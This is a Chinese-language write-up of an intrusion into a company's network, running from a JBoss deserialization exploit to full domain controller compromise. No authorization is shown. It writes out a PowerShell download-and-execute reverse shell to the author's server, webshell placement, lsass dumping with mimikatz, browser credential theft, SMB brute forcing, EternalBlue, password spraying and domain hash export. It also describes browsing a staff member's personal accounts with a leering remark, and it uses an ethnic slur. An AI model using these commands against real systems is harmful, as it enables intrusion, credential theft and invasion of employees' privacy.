从cve到幸运域控

前言
这次渗透测试是从一个CVE开始的，从阿三外网的Jboss打点到内网然后到域控,手法很简单常规,主要还是要扩展一下思路吧哈哈哈!

打点
首先对发现了该站点的JBoss页面，经过测试发现具有JBoss反序列化漏洞

使用网上提供的EXP和利用方法,获取了一个shell。

这里看到对方是windows系统，当前用户权限是管理员权限。并且该机器具有两张网卡，通向了两个网段,存在域环境
想直接上线cs多人运动,发现上线失败,机器也是出网的,尝试powershell,hta,exe wmi都不行，真的奇怪，对方机器并无杀软。

tasklist /svc

这里就想着先拿一个稳定的shell，想往部署war包的路径写个冰蝎的马,
由于这个shell并不稳定 这里远程加载powercat脚本反弹到vps上

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c ip -p 9000 -e cmd

在jboss/server/default/deploy/management/目录 echo写入 冰蝎的马子
windows下注意要使用^对尖括号进行转义 本地实验一下,成功

往目标机器写入 成功连接,very good

至此打点成功 看了一下好像挺多前辈的痕迹的哈哈哈

本机信息收集
拿到webshell后先维权。然后依托当前机器收集尽可能多的信息 迅速了解目标的内网大致网络结构和机器软件环境 为下一步继续深入做好准备

ipconfig /all &&netstat -ano &&arp -a  查看当前机器处于哪个环境哪个网段
wmic os get caption,csdversion,osarchitecture,version 抓明文之前了解目标系统版本 有些默认是抓不到明文的
wmic product get name,version 查看安装软件列表
whoami /user &&quer user 
tasklist /v && net start 
systeminfo

可以看到当前我们获得的这台是win7企业版的主机 且处在域内。有2张网卡 通向2个网段
然后不断的翻资料，不断的翻资料
翻到这家企业的人力资源手册 wifi密码 网关 疑似oracle数据账号密码等信息

把人力资源手册翻译看看 发现这是一家xx私人有限公司 

包括企业的政策及用人部分分配处分等信息

通过图标大致英文通过搜索引擎得到他的官网 www.sxxxx.com

把资料翻完之后 抓取一下浏览器记录及密码
使用hack-browser-data
抓取下来本地查看

还是有很多有价值的密码的 把这些密码收集起来 还发现他用gmail邮箱注册了一个网站的账号 哇呜
然后登录查看一下这些网站的发现这台机的主人还有玩一些投资的平台哈哈哈,是位美女喔 具体是什么没深入下去

有个网站引起了我的注意 登录发现这是一个企业内部操作平台类似OA吧
可以看到大量企业人员的信息 并且可进行通话 这个操作真的太强了

然后尝试抓密码
prodump导出

procdump64.exe -accepteula -ma lsass.exe 1.dmp

makecab c:\jboss\bin\1.dmp  1.zip

利用windows自带的压缩工具压缩一下然后下载回来

离线mimikatz读取

mimikatz.exe "log" "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit

我x！直接抓到域管账号administrator的密码,oh my god 我直呼好家伙
其实挺好奇的 看了一下该机器名 为EDP
接着百度了一下

emmmm 应该就是高层人员的意思吧,当前获取的是一名高层女主管机器
然后整理收集得到的密码 相对来说还是相对丰富的

域内信息收集

net group /domain 查看域组
net group "domain users" /domain 域内用户 
net group "domain admins" /domain 域管用户
net group "domain computers" /domain 域内机器 
net group "domain controllers" /domain域控机器
定位域控

这个内网还是相当多机器的

可以看到域控的机器名为ADC1
通过Ipconfig /all 看到dns服务器为192.168.0.100该机器
通过ping 域名查看

可以确认192.168.0.100为域控

gpp 查看共享组策略目录中是否存在密码
搜索存放在GPP目录中的各类明文的账号密码，共享组策略目录是域中最容易出现密码的地方，一般管理员会把一些bat脚本放在里面用来重置域内客户机器本地的administrator的密码
留意syslog netlogon

net time /domain
net view adc1
dir \\adc1\netlogon
dir \\adc1\syslog

但并无结果

获取域内spn记录
摸清域内敏感机器资产的分布。方便之后突破。
可以拿着这些获取到的机器名，来快速完整探测当前域内的所有存活主机
通过net view还是比较不准的 开启防火墙也是探测不到的

setspn -T xxx.com -Q */* >spn.txt

接着对拉回来的spn文件进行处理，获取spn记录前面的主机名字

grep "CN=" spn.txt | awk -F "," {'print $1'} | awk -F "=" {'print $2'} > host.txt

通过SPN我们可以获取到域内的存活主机何一些主机的具体作用。可以通过主机的名字来获取到这个主机提供什么服务。
除了SPN收集域内的信息的话，还可以通过bloodHound来获取域内的一些信息。接着快速抓取当前域内的所有用户，组，会话，数据，上传exe文件上去然后再把数据给回去下来

内网存活机器及资产搜集
利用毒液venom代理

smb探测
挂socks5 msf里的smb_versionb模块 看当前你的网速 越快越准

setg Proxies socks5:ip:端口
setg reverseallowproxy true
set rhosts file:/home/kali/Desktop/ip.txt
set threads 15

利用收集到的密码对内网机器进行批量smb弱口令探测 连接
整理出来

还是收获很大的
对其他服务器进行弱口令探测
爆破出一台linux主机 一台windows主机查找文件 

查看历史命令等其他信息并无发现

探测内网web资产

内网jboss拿下8台
企业管理后台
尝试弱口令与之前的密码 无果

mirth connect xx信息接口集成引擎
admin/admin弱口令进入

对内网的Windows机器进行永恒之蓝渗透
对内网的主机进行MS17-010漏洞探， 通过venom把msf代入内网进行探测，发现了有很多主机都存在有永恒之蓝的漏洞

主机为64位 migrate迁移进程

利用Kiwi读取密码

打下十几台主机 其中包括几台敏感的机器 想继续深度挖掘的 但是太累了哈哈哈！继续深度挖掘就抓密码读敏感文件 谷歌浏览器账号密码 一直反复拿到自己想要拿的资料为止吧！

看到内部人员的入职等情况 继续利用Kiwi读取密码

读取了4 5台后发现密码几乎一样 是站点域名@123 看来还是很多根据域名xxx@123等来设置密码的啊
那么我们可以尝试利用域用户来进行一波密码喷射看看效果如何

可以看到还是非常多域内用户使用了该密码
这边使用wmiexec.py连接域控

python3 ./wmiexec.py sxxxx/Administrator:密码@192.168.0.100

发现开启3389尝试连接域控
成功连接

利用域管密码导出域内用户hash

可以看到密码复用率非常高！！基本只有几个用户密码是不一样的

后续
失败的溯源
在一个盘符里面看到了个bat文件 打开一看应该是前辈留下来的哈哈哈 看看能不能溯源一下

可以看到这个应该是cs的https的监听端口
某个地区的xx云 这台估计就是前辈的c2服务器了吧！
通过威胁平台查看一下

估计是dns解析上线cs 盲猜一波 后面3个估计是cs1 cs2 cs3
这里查不到邮箱等注册信息 是做了隐私保护吧！这里如果能查到注册者或者邮箱的话还可以进行下一步 后续通过搜索引擎对这个ip进行信息收集了一段时间后 并无什么成果 哈哈哈 思路暂时断

总结
这次渗透测试来说还是挺顺利的
就是不断信息收集进行突破,真的是信息收集到一定程度时,已经能拿下很多机器了。